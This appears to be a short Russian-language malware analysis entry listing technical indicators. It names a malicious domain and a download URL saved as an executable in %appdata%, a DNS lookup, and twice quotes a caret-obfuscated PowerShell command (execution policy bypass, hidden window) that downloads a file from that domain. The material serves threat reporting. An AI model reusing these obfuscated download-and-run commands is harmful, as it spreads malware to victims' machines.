Техническая информация
- http://footarepu.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POWE^RSHEl^l.EXE ^-^e^xecU^ti^o^nPO^l^Icy ^By^pAS^s^ -^nOP^r^O^f^I^l^e -wi^nD^owStYLE ^hidDeN ^(n^Ew^-OB^Je^ct sYSTE^m^.n^e^T^.W^EB^clIeNT).do^w^n^LOA^d^fI^le^(^'http://foota...
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /c "POWE^RSHEl^l.EXE ^-^e^xecU^ti^o^nPO^l^Icy ^By^pAS^s^ -^nOP^r^O^f^I^l^e -wi^nD^owStYLE ^hidDeN ^(n^Ew^-OB^Je^ct sYSTE^m^.n^e^T^.W^EB^clIeNT).do^w^n^LOA^d^fI^le^(^'http://foota...' (со скрытым окном)